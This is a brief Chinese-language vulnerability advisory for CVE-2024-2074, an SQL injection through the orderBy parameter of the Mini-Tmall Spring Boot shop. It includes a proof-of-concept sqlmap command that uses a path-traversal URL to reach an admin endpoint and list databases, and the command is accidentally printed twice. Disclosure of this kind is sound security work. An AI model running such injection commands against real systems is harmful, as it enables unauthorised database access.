漏洞描述
Mini-Tmall是基于Spring Boot的迷你天猫商城。 Mini-Tmall中存在SQL注入漏洞,此漏洞是由于未充分验证用户输入orderBy的数据所导致的。
Mini-Tmall CVE-2024-2074 SQL注入漏洞
PoC代码
python3 sqlmap.py -u "http://localhost:8082/admin/login/../../tmall/admin/reward/1/1?orderBy=1" --dbs -v 3python3 sqlmap.py -u "http://localhost:8082/admin/login/../../tmall/admin/reward/1/1?orderBy=1" --dbs -v 3